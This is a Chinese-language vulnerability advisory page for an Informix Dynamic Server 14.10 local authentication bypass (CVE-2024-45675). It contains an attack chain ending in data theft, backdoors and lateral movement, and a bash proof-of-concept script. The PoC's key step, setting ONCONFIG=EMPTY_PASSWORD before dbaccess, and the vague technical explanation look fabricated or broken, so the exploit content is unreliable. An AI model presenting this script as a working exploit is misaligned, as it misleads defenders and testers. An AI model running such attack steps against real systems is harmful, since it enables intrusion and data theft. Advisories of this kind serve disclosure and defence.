CVE-2024-45675 IBM Informix Dynamic Server 本地管理员无密码认证绕过漏洞

漏洞信息

漏洞编号

CVE-2024-45675

漏洞类型

认证绕过

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

IBM Informix Dynamic Server 14.10

漏洞概述

CVE-2024-45675是IBM Informix Dynamic Server中的一个高危本地认证绕过漏洞。IBM Informix Dynamic Server是一款由IBM开发的关系型数据库管理系统，广泛应用于企业级数据存储和处理场景。该漏洞存在于版本14.10中，允许本地系统上的用户能够在不使用任何密码的情况下成功登录到Informix服务器，并获得管理员（informix用户）权限。由于CVSS评分达到8.4（高危级别），且攻击向量为本地访问，这意味着任何能够访问目标系统的攻击者都可以立即获取数据库的最高控制权。成功利用此漏洞后，攻击者可以执行任意数据库操作，包括读取、修改或删除敏感数据，甚至可能通过数据库系统的特权进行进一步横向移动或提权操作，对企业数据安全构成严重威胁。

技术细节

该漏洞的根本原因在于IBM Informix Dynamic Server 14.10版本中的本地认证机制存在严重缺陷。在正常情况下，数据库管理员需要通过正确的用户名和密码组合才能获得管理员权限。然而，该漏洞允许本地攻击者通过特定的连接参数或直接使用默认/空凭据即可绕过身份验证过程。具体来说，攻击者可以利用Informix的本地连接机制，在不提供有效密码的情况下建立与数据库服务器的连接。一旦成功连接，攻击者将自动获得informix用户的所有权限，包括数据库管理、数据操作和系统配置等。由于这是本地攻击，攻击者需要首先获得目标系统的某种访问权限（如shell访问或物理访问），但一旦获得访问权限，攻击就可以立即执行，无需额外的技术门槛或复杂操作。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的本地访问权限（通过物理访问、恶意软件或其他方式）

STEP 2

步骤2

攻击者在目标系统上启动Informix客户端工具（如dbaccess、onmode等）

STEP 3

步骤3

攻击者尝试连接Informix服务器，使用默认用户名informix和不提供密码

STEP 4

步骤4

由于漏洞存在，服务器接受该空密码认证请求，攻击者成功建立连接

STEP 5

步骤5

攻击者获得informix用户权限，可以执行任意数据库操作和系统命令

STEP 6

步骤6

攻击者可以进行数据窃取、修改业务数据、安装后门或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2024-45675 PoC - IBM Informix Dynamic Server Local Authentication Bypass
# This PoC demonstrates the authentication bypass vulnerability in IBM IDS 14.10

echo "[*] CVE-2024-45675 IBM Informix Dynamic Server Authentication Bypass PoC"
echo "[*] Target: IBM Informix Dynamic Server 14.10"

# Check if onconnect or dbaccess is available
if ! command -v onmode &> /dev/null; then
    echo "[-] Error: IBM Informix utilities not found"
    echo "[-] This script must be run on a system with IBM IDS installed"
    exit 1
fi

# Method 1: Try connection with empty password as informix user
# In a vulnerable system, this may succeed without password prompt
echo "[+] Attempting authentication bypass with empty password..."
sql_cmd="SELECT FIRST 1 * FROM sysmaster:sysdatabases;"

# Try to connect without password (vulnerable behavior)
echo $sql_cmd | ONCONFIG=EMPTY_PASSWORD dbaccess sysmaster -

if [ $? -eq 0 ]; then
    echo "[+] VULNERABLE: Authentication bypass successful!"
    echo "[+] Attacker has gained administrator access to Informix server"
    echo "[+] Possible actions: data exfiltration, privilege escalation, persistence"
else
    echo "[-] Target may not be vulnerable or access is restricted"
fi

# Note: Actual exploitation may require specific Informix environment variables
# and connection strings. Refer to IBM documentation for proper connection methods.

影响范围

IBM Informix Dynamic Server 14.10

防御指南

临时缓解措施

由于该漏洞需要本地访问才能利用，首要的临时缓解措施是严格限制对运行IBM Informix服务器系统的物理和逻辑访问。确保只有经过严格授权的管理员才能访问数据库服务器。同时，监控和审计所有本地登录尝试，配置入侵检测系统（IDS）监控异常访问模式。虽然无法完全阻止已获得本地访问权限的攻击者，但多层防御措施可以降低被利用的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2024-45675
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2024-45675
3 Details https://www.cvedetails.com/cve/CVE-2024-45675/
4 VulDB https://vuldb.com/cve/CVE-2024-45675
5 Link https://www.ibm.com/support/pages/node/7252704